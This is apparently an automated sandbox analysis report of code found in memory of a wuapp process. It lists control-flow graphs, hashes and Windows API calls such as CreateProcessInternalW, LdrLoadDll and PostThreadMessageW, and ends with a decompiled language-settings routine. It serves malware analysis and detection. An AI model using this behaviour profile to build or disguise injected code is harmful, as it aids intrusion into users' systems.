                                                        • Opcode ID: 435d5b72a1cbef6549f2c0d885b1f2f7dec4cc8403c773cfc9aa7e74d2998e0e
                                                        • Instruction ID: b6f15609c9afcf28beaec656b7120ed86709098451c8e63a3bd9031df59ab28e
                                                        • Opcode Fuzzy Hash: 435d5b72a1cbef6549f2c0d885b1f2f7dec4cc8403c773cfc9aa7e74d2998e0e
                                                        • Instruction Fuzzy Hash: DF31AFB6602704ABD725DF69D8A1FA7B7B8FF48700F00811DFA1A9B281D731A555CBE0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Basic blocks (node: address range, calls) and their successors:
                                                        • 321: 128fe6-12901f -> 322, 323
                                                        • 322: 12902b-129032 -> 324, 325
                                                        • 323: 129026, call 12be20 -> 322
                                                        • 324: 129038-129088, call 12bef0, call 11a0e0, call 125a40 -> 333
                                                        • 325: 12910c-129112
                                                        • 333: 129090-1290a1, Sleep -> 334, 335
                                                        • 334: 1290a3-1290a9 -> 336, 337
                                                        • 335: 129106-12910a -> 325, 333
                                                        • 336: 1290d3-1290f4, call 128e20 -> 341
                                                        • 337: 1290ab-1290d1, call 128c20 -> 341
                                                        • 341: 1290f9-1290fc -> 335
                                                        APIs
                                                        • Sleep.KERNELBASE(000007D0), ref: 00129098
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID: net.dll$wininet.dll
                                                        • API String ID: 3472027048-1269752229
                                                        • Opcode ID: f67f2977435e73d15df1aeb201953e657b79fd99b1269b873f98a0ab67329ae0
                                                        • Instruction ID: 52de95da94e18399b7e5f73a1cdc2d49582522d944d7c36cab4332a74b47a4fb
                                                        • Opcode Fuzzy Hash: f67f2977435e73d15df1aeb201953e657b79fd99b1269b873f98a0ab67329ae0
                                                        • Instruction Fuzzy Hash: EB31E3B2601315ABD715DF68D891FABBBB4EF48700F10811DFA199B282D371A465CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Basic blocks (node: address range, calls) and their successors:
                                                        • 342: 1175f3-1175f4 -> 343, 344
                                                        • 343: 117634-11766c, call 12bf40, call 12cb20, call 11a0e0 -> 346
                                                        • 344: 1175f6 -> 345, 346
                                                        • 345: 1175f8-117603 -> 343
                                                        • 346: 11766d-11767a, call 125a40 -> 353, 354
                                                        • 353: 11767c-11768e, PostThreadMessageW -> 355, 356
                                                        • 354: 1176ae-1176b2
                                                        • 355: 117690-1176ab, call 119840, PostThreadMessageW -> 356
                                                        • 356: 1176ad -> 354
                                                        APIs
                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 0011768A
                                                        • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 001176AB
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: e8f10ab93e280f6c44fd0f173b9b351da9bb6be2d6eccab9178df92255b65650
                                                        • Instruction ID: 33b5d2a2806d6f6322fb794a313e641e4b97143cb726307463605b20e630ed8f
                                                        • Opcode Fuzzy Hash: e8f10ab93e280f6c44fd0f173b9b351da9bb6be2d6eccab9178df92255b65650
                                                        • Instruction Fuzzy Hash: C0012631A801287AE724A698DC43FFE7728EF54B51F044139FB04FA2C1E7A46D4687E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Basic blocks (node: address range, calls) and their successors:
                                                        • 377: 117630-11763f -> 378, 379
                                                        • 378: 117648-11767a, call 12cb20, call 11a0e0, call 125a40 -> 387, 388
                                                        • 379: 117643, call 12bf40 -> 378
                                                        • 387: 11767c-11768e, PostThreadMessageW -> 389, 390
                                                        • 388: 1176ae-1176b2
                                                        • 389: 117690-1176ab, call 119840, PostThreadMessageW -> 390
                                                        • 390: 1176ad -> 388
                                                        APIs
                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 0011768A
                                                        • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 001176AB
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 936f838c949d7ac0cd1410a4ea2eb09aa53af833da505c72487ee6613ac9fd53
                                                        • Instruction ID: 216dab69a109edcd564df7bcbb608a72884071bdb94dfc5816dd3b4ca2135f1c
                                                        • Opcode Fuzzy Hash: 936f838c949d7ac0cd1410a4ea2eb09aa53af833da505c72487ee6613ac9fd53
                                                        • Instruction Fuzzy Hash: 5401A231A802287BE724A6959C43FFE776C9F14B50F044128FF04BA1C1E7A4690687E6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Basic blocks (node: address range, calls) and their successors:
                                                        • 361: 117629-11763f -> 362, 363
                                                        • 362: 117648-11767a, call 12cb20, call 11a0e0, call 125a40 -> 371, 372
                                                        • 363: 117643, call 12bf40 -> 362
                                                        • 371: 11767c-11768e, PostThreadMessageW -> 373, 374
                                                        • 372: 1176ae-1176b2
                                                        • 373: 117690-1176ab, call 119840, PostThreadMessageW -> 374
                                                        • 374: 1176ad -> 372
                                                        APIs
                                                        • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 0011768A
                                                        • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 001176AB
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: MessagePostThread
                                                        • String ID:
                                                        • API String ID: 1836367815-0
                                                        • Opcode ID: 3ce97a60d7b82ec3734065e22fa696d29ea73bdd6f64d2ef20b3ec9f9ab80729
                                                        • Instruction ID: 7daa64186901603dbf1dba4ec96a5cb6229d2d7eb194ad5ac550362d0a3467b8
                                                        • Opcode Fuzzy Hash: 3ce97a60d7b82ec3734065e22fa696d29ea73bdd6f64d2ef20b3ec9f9ab80729
                                                        • Instruction Fuzzy Hash: 73018431A806287BE735A6A49C43FFE7B2C9F55B50F144128FB04BA1C1E7A46A0687E5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        Basic blocks (node: address range, calls) and their successors:
                                                        • 588: 12911a-12911b -> 589, 590
                                                        • 589: 12919a -> 593, 594
                                                        • 590: 12911d-12911e -> 591, 592
                                                        • 591: 129120-129148, call 125a40 -> 601, 602
                                                        • 592: 12910f-129112
                                                        • 593: 1291b0-129279, call 12bec0 (x2), call 12c190, call 12bec0, call 12c190, call 12bec0 (x2) -> 603, 617
                                                        • 594: 12919c-1291aa -> 593, 603
                                                        • 601: 129167-12916c
                                                        • 602: 12914a-129166, call 12f39f, CreateThread
                                                        • 603: 12928d-129290
                                                        • 617: 12927b-129284 -> 603, 618
                                                        • 618: 129286 -> 603
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0011D290,?,?), ref: 0012915C
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: f16cc74794a770b92e1aa6bab936f624af8927e6ebb14edd164ca71e6778d891
                                                        • Instruction ID: 93ccb382b997a34f984dea87268ea82bfbd743ec8449e668f97dc4b1107ec708
                                                        • Opcode Fuzzy Hash: f16cc74794a770b92e1aa6bab936f624af8927e6ebb14edd164ca71e6778d891
                                                        • Instruction Fuzzy Hash: A431B276201715BBD314DB78ECE2FE7B3A8EF98740F004519F6199A181DB70B82987A0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 627 11a0e0-11a109 call 12cd70 630 11a10b-11a10e 627->630 631 11a10f-11a11d call 12d190 627->631 634 11a12d-11a13e call 12b4c0 631->634 635 11a11f-11a12a call 12d410 631->635 640 11a140-11a154 LdrLoadDll 634->640 641 11a157-11a15a 634->641 635->634 640->641
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0011A152
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 40796ed2abedf08632889fec39371184e398d1dfafb99c177ad60987c42a2680
                                                        • Instruction ID: 01ea53c551505d48e6ce3c6f7fd9feea2f987eb1129a23e52f09da96111709ef
                                                        • Opcode Fuzzy Hash: 40796ed2abedf08632889fec39371184e398d1dfafb99c177ad60987c42a2680
                                                        • Instruction Fuzzy Hash: E0011EB5E4020DBBDB14EAE4EC42FDDB7B89F54308F1041A5E90897241F731EB588B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        control_flow_graph 643 12a612-12a61e 644 12a620-12a64c call 12af20 643->644 645 12a5ad-12a5b4 643->645 646 12a5bc-12a5d1 RtlAllocateHeap 645->646 647 12a5b7 call 12af20 645->647 647->646
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00125126,?,0012589F,0012589F,?,00125126,?,?,?,?,?,00000000,00000005,00000206), ref: 0012A5CD
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: c360dfa50225b9bcdd48af04216d2a876772242fff17f93ccfc2363367a525cc
                                                        • Instruction ID: e34dc3cf9586969f744e63e98fbf2605bdf5c4150ee395c5ecfa7843d7ab4a07
                                                        • Opcode Fuzzy Hash: c360dfa50225b9bcdd48af04216d2a876772242fff17f93ccfc2363367a525cc
                                                        • Instruction Fuzzy Hash: 55F022B62043042FCB20EFA9EC80EDB7798AF85364F008449F84C5B603C630E915CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 0012A6A4
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                                        • Instruction ID: 5c254d0d6d73717242566072e71c41882398f2dc172016d647cf05f47ea51bd6
                                                        • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                                        • Instruction Fuzzy Hash: E201B2B2210108BFCB54DF89DC80EEB77ADAF8C754F118258BA0D97245C630EC51CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 0012A6A4
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: 0f1ce346c5fce77d5ce9fae80055a9ec3d393922c69a97fbae8876696ff47ec7
                                                        • Instruction ID: 9b67271ff9bbd4cc108861d857b489d98c59deb28fc42aa1e427b9dd5c62527f
                                                        • Opcode Fuzzy Hash: 0f1ce346c5fce77d5ce9fae80055a9ec3d393922c69a97fbae8876696ff47ec7
                                                        • Instruction Fuzzy Hash: 1101B6B6210108BFCB54CF89DC81EEB77ADAF8C754F118258FA0D97255C634E851CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0011D290,?,?), ref: 0012915C
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: 0fb4d47717480a5baf77f538d5614a21f461a549888388fa5683e808b0705816
                                                        • Instruction ID: d342525c5dce3f71d072afe121a28d9369a35dedd4526deb2f4f3b6aa679bbe2
                                                        • Opcode Fuzzy Hash: 0fb4d47717480a5baf77f538d5614a21f461a549888388fa5683e808b0705816
                                                        • Instruction Fuzzy Hash: 18E06D3338031436E32065A9AC03FA7B69CDB90B20F14002AFA0DEB2C1E6A1F81142A4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 0012A6A4
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInternalProcess
                                                        • String ID:
                                                        • API String ID: 2186235152-0
                                                        • Opcode ID: 80d6f94866a088d8ddd6de59a7225987c9e8ef4e9489aebd4d8ef52862bfbc53
                                                        • Instruction ID: 1ff20e7b23da0e3201b930621ac41e6e495a00bde4590533d4b66943d895e02f
                                                        • Opcode Fuzzy Hash: 80d6f94866a088d8ddd6de59a7225987c9e8ef4e9489aebd4d8ef52862bfbc53
                                                        • Instruction Fuzzy Hash: 7EF062B6210019AF8B44DF9DEC80DEB73ADAF8C714B559208FA1DD3255D634EC518BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00125126,?,0012589F,0012589F,?,00125126,?,?,?,?,?,00000000,00000005,00000206), ref: 0012A5CD
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                                        • Instruction ID: 8e8685c87d34bd88589782826ba7efad9a2e72207c1041887653f436947d1f5b
                                                        • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                                        • Instruction Fuzzy Hash: 60E04FB12002146BDB14DF49DC45E9B37ACEF88754F018154FE085B241C630F910CBF1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 0012A60D
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                                        • Instruction ID: fd87d305bc0daff27ead6cb41e74f1345f81174dbadaa449077f71de208cafeb
                                                        • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                                        • Instruction Fuzzy Hash: DCE04FB12002146FD714DF49DC49EA737ACEF88750F114154FD0857241C630F910CAF1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,0011D562,0011D562,?,00000000,?,?), ref: 0012A770
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                                        • Instruction ID: ef2c1c70304ca26d6def4ddd0886e387c0c6805ec189b833294cc4729231fc7c
                                                        • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                                        • Instruction Fuzzy Hash: 40E01AB22002186BDB10DF49DC45EE737ADAF89654F018154BA0857241C630E8148AB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,001181E3,?), ref: 0011D9FB
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 86cc229081c305ac01309eada17de36257433ccebb23e2f073137eebbef059e9
                                                        • Instruction ID: 43874208f569bae6e8495ba0e69cb74bbf68539377b37e3e597d287216ebec6b
                                                        • Opcode Fuzzy Hash: 86cc229081c305ac01309eada17de36257433ccebb23e2f073137eebbef059e9
                                                        • Instruction Fuzzy Hash: 88D097E15A83092AF760F7F0ACC3F263E048B00300F0A02E8E418AF0C3CE54D0509236
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,001181E3,?), ref: 0011D9FB
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 9150d0d40ae8b8939ca8b65567a20e3e661ab3ee174f96d1588e7d8f6837221b
                                                        • Instruction ID: c27dc1dc4cb476c27ea6ec7bf8f8525814befb57dcd3919d9594123bda2f071f
                                                        • Opcode Fuzzy Hash: 9150d0d40ae8b8939ca8b65567a20e3e661ab3ee174f96d1588e7d8f6837221b
                                                        • Instruction Fuzzy Hash: 32D0A77264030837F710E6E49C43F6636CC9B48B04F0540B4F909DB3C3DA60F4004165
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0011A152
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_110000_wuapp.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 0ba5eb0ca508fad6ddbea8a944ac1c6cea52edcdc7b16ad42aba06ba11698ec8
                                                        • Instruction ID: 2ec5fcba1596988ef6f001221be91c15e582cef8671a60fcc2881df41cf59e77
                                                        • Opcode Fuzzy Hash: 0ba5eb0ca508fad6ddbea8a944ac1c6cea52edcdc7b16ad42aba06ba11698ec8
                                                        • Instruction Fuzzy Hash: 4AC0C030E25104AFEF10C5944C02FF833D0C7103B3F7001E66C0CC7241D5120C000290
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 94%
                                                        			E01EC8788(signed int __ecx, void* __edx, signed int _a4) {
                                                        				signed int _v8;
                                                        				short* _v12;
                                                        				void* _v16;
                                                        				signed int _v20;
                                                        				char _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				char _v36;
                                                        				signed int _v40;
                                                        				char _v44;
                                                        				signed int _v48;
                                                        				signed int _v52;
                                                        				signed int _v56;
                                                        				signed int _v60;
                                                        				char _v68;
                                                        				void* _t216;
                                                        				intOrPtr _t231;
                                                        				short* _t235;
                                                        				intOrPtr _t257;
                                                        				short* _t261;
                                                        				intOrPtr _t284;
                                                        				intOrPtr _t288;
                                                        				void* _t314;
                                                        				signed int _t318;
                                                        				short* _t319;
                                                        				intOrPtr _t321;
                                                        				void* _t328;
                                                        				void* _t329;
                                                        				char* _t332;
                                                        				signed int _t333;
                                                        				signed int* _t334;
                                                        				void* _t335;
                                                        				void* _t338;
                                                        				void* _t339;
                                                        
                                                        				_t328 = __edx;
                                                        				_t322 = __ecx;
                                                        				_t318 = 0;
                                                        				_t334 = _a4;
                                                        				_v8 = 0;
                                                        				_v28 = 0;
                                                        				_v48 = 0;
                                                        				_v20 = 0;
                                                        				_v40 = 0;
                                                        				_v32 = 0;
                                                        				_v52 = 0;
                                                        				if(_t334 == 0) {
                                                        					_t329 = 0xc000000d;
                                                        					L49:
                                                        					_t334[0x11] = _v56;
                                                        					 *_t334 =  *_t334 | 0x00000800;
                                                        					_t334[0x12] = _v60;
                                                        					_t334[0x13] = _v28;
                                                        					_t334[0x17] = _v20;
                                                        					_t334[0x16] = _v48;
                                                        					_t334[0x18] = _v40;
                                                        					_t334[0x14] = _v32;
                                                        					_t334[0x15] = _v52;
                                                        					return _t329;
                                                        				}
                                                        				_v56 = 0;
                                                        				if(E01EC8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                        					_v56 = 1;
                                                        					if(_v8 != 0) {
                                                        						_t207 = E01EAE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                        					}
                                                        					_push(1);
                                                        					_v8 = _t318;
                                                        					E01EC718A(_t207);
                                                        					_t335 = _t335 + 4;
                                                        				}
                                                        				_v60 = _v60 | 0xffffffff;
                                                        				if(E01EC8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                        					_t333 =  *_v8;
                                                        					_v60 = _t333;
                                                        					_t314 = E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        					_push(_t333);
                                                        					_v8 = _t318;
                                                        					E01EC718A(_t314);
                                                        					_t335 = _t335 + 4;
                                                        				}
                                                        				_t216 = E01EC8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                        				_t332 = ";";
                                                        				if(_t216 < 0) {
                                                        					L17:
                                                        					if(E01EC8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                        						L30:
                                                        						if(E01EC8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                        							L46:
                                                        							_t329 = 0;
                                                        							L47:
                                                        							if(_v8 != _t318) {
                                                        								E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                        							}
                                                        							if(_v28 != _t318) {
                                                        								if(_v20 != _t318) {
                                                        									E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                        									_v20 = _t318;
                                                        									_v40 = _t318;
                                                        								}
                                                        							}
                                                        							goto L49;
                                                        						}
                                                        						_t231 = _v24;
                                                        						_t322 = _t231 + 4;
                                                        						_push(_t231);
                                                        						_v52 = _t322;
                                                        						E01EC718A(_t231);
                                                        						if(_t322 == _t318) {
                                                        							_v32 = _t318;
                                                        						} else {
                                                        							_v32 = E01EAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        						}
                                                        						if(_v32 == _t318) {
                                                        							_v52 = _t318;
                                                        							L58:
                                                        							_t329 = 0xc0000017;
                                                        							goto L47;
                                                        						} else {
                                                        							E01EA2340(_v32, _v8, _v24);
                                                        							_v16 = _v32;
                                                        							_a4 = _t318;
                                                        							_t235 = E01EBE679(_v32, _t332);
                                                        							while(1) {
                                                        								_t319 = _t235;
                                                        								if(_t319 == 0) {
                                                        									break;
                                                        								}
                                                        								 *_t319 = 0;
                                                        								_t321 = _t319 + 2;
                                                        								E01EAE2A8(_t322,  &_v68, _v16);
                                                        								if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
                                                        									_a4 = _a4 + 1;
                                                        								}
                                                        								_v16 = _t321;
                                                        								_t235 = E01EBE679(_t321, _t332);
                                                        								_pop(_t322);
                                                        							}
                                                        							_t236 = _v16;
                                                        							if( *_v16 != _t319) {
                                                        								E01EAE2A8(_t322,  &_v68, _t236);
                                                        								if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
                                                        									_a4 = _a4 + 1;
                                                        								}
                                                        							}
                                                        							if(_a4 == 0) {
                                                        								E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                        								_v52 = _v52 & 0x00000000;
                                                        								_v32 = _v32 & 0x00000000;
                                                        							}
                                                        							if(_v8 != 0) {
                                                        								E01EAE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                        							}
                                                        							_v8 = _v8 & 0x00000000;
                                                        							_t318 = 0;
                                                        							goto L46;
                                                        						}
                                                        					}
                                                        					_t257 = _v24;
                                                        					_t322 = _t257 + 4;
                                                        					_push(_t257);
                                                        					_v40 = _t322;
                                                        					E01EC718A(_t257);
                                                        					_t338 = _t335 + 4;
                                                        					if(_t322 == _t318) {
                                                        						_v20 = _t318;
                                                        					} else {
                                                        						_v20 = E01EAE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                        					}
                                                        					if(_v20 == _t318) {
                                                        						_v40 = _t318;
                                                        						goto L58;
                                                        					} else {
                                                        						E01EA2340(_v20, _v8, _v24);
                                                        						_v16 = _v20;
                                                        						_a4 = _t318;
                                                        						_t261 = E01EBE679(_v20, _t332);
                                                        						_t335 = _t338 + 0x14;
                                                        						while(1) {
                                                        							_v12 = _t261;
                                                        							if(_t261 == _t318) {
                                                        								break;
                                                        							}
                                                        							_v12 = _v12 + 2;
                                                        							 *_v12 = 0;
                                                        							E01EAE2A8(_v12,  &_v68, _v16);
                                                        							if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
                                                        								_a4 = _a4 + 1;
                                                        							}
                                                        							_v16 = _v12;
                                                        							_t261 = E01EBE679(_v12, _t332);
                                                        							_pop(_t322);
                                                        						}
                                                        						_t269 = _v16;
                                                        						if( *_v16 != _t318) {
                                                        							E01EAE2A8(_t322,  &_v68, _t269);
                                                        							if(E01EC5553(_t328,  &_v68,  &_v36) != 0) {
                                                        								_a4 = _a4 + 1;
                                                        							}
                                                        						}
